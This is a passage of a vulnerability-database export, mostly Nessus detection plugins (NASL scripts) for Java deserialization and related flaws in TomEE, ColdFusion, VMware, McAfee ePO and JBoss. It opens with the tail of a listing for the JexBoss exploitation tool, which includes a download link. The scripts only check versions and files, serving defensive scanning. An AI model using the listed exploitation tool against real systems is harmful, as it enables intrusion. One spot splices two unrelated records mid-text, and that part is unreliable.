8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n**[Download JexBoss](<https://github.com/joaomatosf/jexboss>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-12-18T21:12:00", "type": "kitploit", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:23:35", "description": "The remote web server is running Apache TomEE 1.x prior to 1.7.4 or 7.x prior to 7.0.0-M3 and is affected by two RCE vulnerabilities :\n\n - A flaw exists in 'EjbObjectInputStream' that is triggered during the deserialization of Java 
serialized input in the binary stream. This may allow a remote attacker to execute arbitrary code. (CVE-2015-8581)\n - A flaw in the EJBd protocol that is triggered during the deserialization of crafted Java Objects. This may allow a remote attacker to execute arbitrary code. Exploitation requires that EJBd is enabled on an instance (the default setting) (CVE-2016-0779)", "cvss3": {}, "published": "2016-05-24T00:00:00", "type": "nessus", "title": "Apache TomEE 1.x < 1.7.4 / 7.x < 7.0.0-M3 Multiple RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8581", "CVE-2016-0779"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:tomee"], "id": "9323.PRM", "href": "https://www.tenable.com/plugins/nnm/9323", "sourceData": "Binary data 9323.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:20", "description": "The version of Adobe ColdFusion running on the remote Windows host is 11.x prior to update 13 or 2016.x prior to update 5. It is, therefore, affected by multiple vulnerabilities :\n\n - A Java deserialization flaw exists that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-11283, CVE-2017-11284)\n\n - A reflected cross-site scripting (XSS) vulnerability exists due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in user's browser session.\n (CVE-2017-11285)\n\n - An unspecified flaw due to improper restriction of XML External Entity Reference. 
(CVE-2017-11286)", "cvss3": {}, "published": "2017-09-13T00:00:00", "type": "nessus", "title": "Adobe ColdFusion 11.x < 11u13 / 2016.x < 2016u5 Multiple Vulnerabilities (APSB17-30)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11283", "CVE-2017-11284", "CVE-2017-11285", "CVE-2017-11286"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/a:adobe:coldfusion"], "id": "COLDFUSION_WIN_APSB17-30.NASL", "href": "https://www.tenable.com/plugins/nessus/103194", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103194);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11283\",\n \"CVE-2017-11284\",\n \"CVE-2017-11285\",\n \"CVE-2017-11286\"\n );\n script_bugtraq_id(100708, 100711, 100715);\n\n script_name(english:\"Adobe ColdFusion 11.x < 11u13 / 2016.x < 2016u5 Multiple Vulnerabilities (APSB17-30)\");\n script_summary(english:\"Checks the hotfix files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web-based application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe ColdFusion running on the remote Windows host is\n11.x prior to update 13 or 2016.x prior to update 5. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A Java deserialization flaw exists that allows an unauthenticated,\n remote attacker to execute arbitrary code. (CVE-2017-11283,\n CVE-2017-11284)\n\n - A reflected cross-site scripting (XSS) vulnerability exists due to\n improper validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially crafted request,\n to execute arbitrary script code in user's browser session.\n (CVE-2017-11285)\n\n - An unspecified flaw due to improper restriction of XML External\n Entity Reference. 
(CVE-2017-11286)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/coldfusion/apsb17-30.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe ColdFusion version 11 update 13 / 2016 update 5 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:coldfusion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"coldfusion_win_local_detect.nasl\");\n script_require_keys(\"SMB/coldfusion/instance\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"coldfusion_win.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversions = make_list('11.0.0', '2016.0.0');\ninstances = get_coldfusion_instances(versions); # this exits if it fails\n\n# Check the hotfixes and cumulative hotfixes\n# installed for each instance of ColdFusion.\ninfo = NULL;\ninstance_info = make_list();\n\nforeach name (keys(instances))\n{\n info = NULL;\n ver = instances[name];\n\n if (ver == \"11.0.0\")\n {\n info = check_jar_chf(name, 13);\n }\n\n else if (ver == \"2016.0.0\")\n {\n info = check_jar_chf(name, 5);\n }\n\n if (!isnull(info))\n instance_info = make_list(instance_info, info);\n}\n\nif (max_index(instance_info) == 0)\n exit(0, \"No vulnerable instances of Adobe ColdFusion were detected.\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port)\n port = 445;\n\nreport =\n '\\n' + 'Nessus detected the following unpatched instances :' +\n '\\n' + join(instance_info, sep:'\\n') +\n '\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xss:TRUE);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:55", "description": "The version of VMware vCenter / vRealize Orchestrator Appliance installed on the remote host is 4.2.x or 5.x or 6.x and includes the Apache Commons Collections (ACC) library version 3.2.1. It is, therefore, affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the ACC library. 
An unauthenticated, remote attacker can exploit this, by sending a crafted request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-01-06T00:00:00", "type": "nessus", "title": "VMware vCenter / vRealize Orchestrator Appliance 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2022-06-29T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator", "cpe:/a:vmware:vrealize_orchestrator"], "id": "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2015_0009.NASL", "href": "https://www.tenable.com/plugins/nessus/87762", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87762);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_xref(name:\"VMSA\", value:\"2015-0009\");\n script_xref(name:\"IAVB\", value:\"2016-B-0006\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"VMware vCenter / vRealize Orchestrator Appliance 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)\");\n script_summary(english:\"Checks the version of VMware vCenter/vRealize Orchestrator Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter / vRealize Orchestrator Appliance\ninstalled on the remote host is 4.2.x or 5.x or 6.x and includes the\nApache Commons Collections (ACC) library version 3.2.1. It is,\ntherefore, affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the ACC\nlibrary. 
An unauthenticated, remote attacker can exploit this, by\nsending a crafted request, to execute arbitrary code on the target\nhost.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2141244\");\n # https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91868e8b\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.infoq.com/news/2015/11/commons-exploit\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch referenced in VMware KB 2141244.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6934\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/18\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_orchestrator\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Orchestrator/Version\", \"Host/VMware vCenter Orchestrator/VerUI\", \"Host/VMware vCenter Orchestrator/Build\", \"HostLevelChecks/proto\", \"Host/local_checks_enabled\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/VerUI\");\n\nproto = get_kb_item_or_exit('HostLevelChecks/proto');\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nif (proto == 'local')\n info_t = INFO_LOCAL;\nelse if (proto == 'ssh')\n{\n info_t = INFO_SSH;\n ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n}\nelse\n exit(0, 'This plugin only attempts to run commands locally or via SSH, and neither is available against the remote host.');\n\napp_name = \"VMware vCenter/vRealize Orchestrator Appliance\";\n\nif (version !~ 
\"^4\\.2($|\\.)\" && version !~ \"^5\\.\" && version !~ \"^6\\.\")\n audit(AUDIT_INST_VER_NOT_VULN, app_name, verui);\n\n# if any of these files exist, we are vulnerable\n# /var/lib/vco/app-server/deploy/vco/WEB-INF/lib/commons-collections-3.2.1.jar\n# /var/lib/vco/configuration/lib/o11n/commons-collections-3.2.1.jar\n# /opt/vmo/app-server/server/vmo/lib/commons-collections.jar\n# /opt/vmo/configuration/jetty/lib/ext/commons-collections.jar\n\nfile1 = \"/var/lib/vco/app-server/deploy/vco/WEB-INF/lib/commons-collections-3.2.1.jar\";\nfile2 = \"/var/lib/vco/configuration/lib/o11n/commons-collections-3.2.1.jar\";\nfile3 = \"/opt/vmo/app-server/server/vmo/lib/commons-collections.jar\";\nfile4 = \"/opt/vmo/configuration/jetty/lib/ext/commons-collections.jar\";\n\nfile1_exists = info_send_cmd(cmd:\"ls \" + file1 + \" 2>/dev/null\");\nfile2_exists = info_send_cmd(cmd:\"ls \" + file2 + \" 2>/dev/null\");\nfile3_exists = info_send_cmd(cmd:\"ls \" + file3 + \" 2>/dev/null\");\nfile4_exists = info_send_cmd(cmd:\"ls \" + file4 + \" 2>/dev/null\");\n\nif(info_t == INFO_SSH) ssh_close_connection();\n\nif (empty_or_null(file1_exists) && empty_or_null(file2_exists) && empty_or_null(file3_exists) && empty_or_null(file4_exists))\n audit(AUDIT_INST_VER_NOT_VULN, app_name, verui);\n\nreport = '\\n Installed version : ' + verui;\nif (!empty_or_null(file1_exists))\n report += '\\n Vulnerable library : ' + file1;\nif (!empty_or_null(file2_exists))\n report += '\\n Vulnerable library : ' + file2;\nif (!empty_or_null(file3_exists))\n report += '\\n Vulnerable library : ' + file3;\nif (!empty_or_null(file4_exists))\n report += '\\n Vulnerable library : ' + file4;\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:58", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 6.x prior to 6.40. 
It is, therefore, affected by a flaw in the Suite API CollectorHttpRelayController component due to improper validation of DiskFileItem objects stored in the 'relay-request' XML before attempting deserialization. An authenticated, remote attacker can exploit this issue, via a specially crafted DiskFileItem object embedded in the XML, to move or write arbitrary content to files, resulting in a denial of service condition.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager ver 6.x < 6.40 Suite API CollectorHttpRelayController RelayRequest Object DiskFileItem Deserialization DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7462"], "modified": "2019-02-26T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_V640_DESERIALIZATION.NASL", "href": "https://www.tenable.com/plugins/nessus/95441", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95441);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/02/26 4:50:08\");\n\n script_cve_id(\"CVE-2016-7462\");\n script_bugtraq_id(94351);\n script_xref(name:\"TRA\", value:\"TRA-2016-34\");\n script_xref(name:\"VMSA\", value:\"2016-0020\");\n\n script_name(english:\"VMware vRealize Operations Manager ver 6.x < 6.40 Suite API CollectorHttpRelayController RelayRequest Object DiskFileItem Deserialization DoS\");\n script_summary(english:\"Checks the version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A cloud operations management application running on the remote web\nserver is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on\nthe remote web server is 6.x prior to 6.40. 
It is, therefore, affected\nby a flaw in the Suite API CollectorHttpRelayController component due\nto improper validation of DiskFileItem objects stored in the\n'relay-request' XML before attempting deserialization. An\nauthenticated, remote attacker can exploit this issue, via a specially\ncrafted DiskFileItem object embedded in the XML, to move or write\narbitrary content to files, resulting in a denial of service\ncondition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2016-34\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version 6.40 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7462\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"install_func.inc\");\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninst = get_single_install(app_name:app, combined:TRUE);\nport = inst['port'];\nver = inst['version'];\npath = inst['path'];\n\nfix = '6.4';\nret = ver_compare(fix:fix,\n minver: '6.0',\n ver:ver,\n strict:TRUE);\n\nif (isnull(ret) || ret >= 0)\n{\n audit(AUDIT_INST_VER_NOT_VULN, app, ver);\n}\nreport =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE,\n extra:report);\nexit(0);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:24", "description": "The version of VMware vCenter / vRealize Orchestrator installed on the remote host is 4.2.x, 5.x, or 6.x and includes the Apache Commons Collections (ACC) library version 3.2.1. It is, therefore, affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the ACC library. 
An unauthenticated, remote attacker can exploit this, by sending a crafted request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-01-06T00:00:00", "type": "nessus", "title": "VMware vCenter / vRealize Orchestrator 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2021-10-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator", "cpe:/a:vmware:vrealize_orchestrator"], "id": "VMWARE_ORCHESTRATOR_VMSA_2015_0009.NASL", "href": "https://www.tenable.com/plugins/nessus/87763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87763);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/25\");\n\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_xref(name:\"VMSA\", value:\"2015-0009\");\n script_xref(name:\"IAVB\", value:\"2016-B-0006\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"VMware vCenter / vRealize Orchestrator 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)\");\n script_summary(english:\"Checks the version of VMware vCenter/vRealize Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter / vRealize Orchestrator installed on the\nremote host is 4.2.x, 5.x, or 6.x and includes the Apache Commons\nCollections (ACC) library version 3.2.1. It is, therefore, affected by\na remote code execution vulnerability due to unsafe deserialize calls\nof unauthenticated Java objects to the ACC library. 
script_dependencies(\"mcafee_epo_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\",\"installed_sw/McAfee ePO\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"McAfee ePO\";\ninstall = get_single_install(\n app_name : app_name,\n exit_if_unknown_ver : FALSE\n);\ndir = install['path'];\nver = install['version'];\nreport = NULL;\n\n# Check version of common-collections jar\njar_path = hotfix_append_path(path:dir, value:\"Installer\\\\Core\\\\lib\");\nshare = hotfix_path2share(path:jar_path);\nbasedir = ereg_replace(string:jar_path, pattern:\"^\\w:(.*)\", replace:\"\\1\");\njars = list_dir(basedir:basedir, level:1, file_pat:\"commons-collections.*\\.jar$\", share:share);\nif (isnull(jars)) \n{\n exit(1, \"No commons-collections jar file found.\");\n}\nmatch = eregmatch(string:jars[0], pattern:\"commons\\-collections\\-([0-9\\.]+)\\.jar$\");\n\nhotfix_check_fversion_end();\nif (isnull(match))\n{\n exit(1,\"A commons-collections jar file exists, however it does not have a version.\");\n}\n\nif(ver_compare(ver:match[1], fix:\"3.2.2\", strict:FALSE) < 0)\n {\n report =\n '\\n Application: McAfee ePolicy Orchestrator ' + ver +\n '\\n Path : ' + jar_path +\n '\\n Version : ' + match[1]+\n '\\n Fix : Upgrade to 5.1.3 or 5.3.1 and then apply\n hotfix EPO5xHF1106041.zip.\n For ePO 5.1.4, contact Vendor.';\n } else {\n audit(AUDIT_INST_VER_NOT_VULN, app_name + ver + \"commons-collections jar\", match[1]);\n}\n\nif (isnull(report))\n audit(AUDIT_UNINST, 'McAfee ePO');\n\nport = kb_smb_transport();\n\nif (report_verbosity > 0)\n security_hole(port:port, extra:report);\nelse\n security_hole(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:20:11", "description": "An update is now available for Red Hat JBoss Enterprise 
Application Platform 6.4 for RHEL 5.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. 
KG) for reporting these issues.", "cvss3": {}, "published": "2017-05-22T00:00:00", "type": "nessus", "title": "RHEL 5 : JBoss EAP (RHSA-2017:1256)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:httpserver", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6", "p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cli", "p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all", "p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp", "p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-connector", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client", "p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner", 
"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3", "p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded", "p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77", "p-cpe:/a:redhat:enterprise_linux:jboss-as-logging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-mail", "p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content", "p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster", "p-cpe:/a:redhat:enterprise_linux:jboss-as-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-as-network", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service", "p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink", "p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean", "p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo", 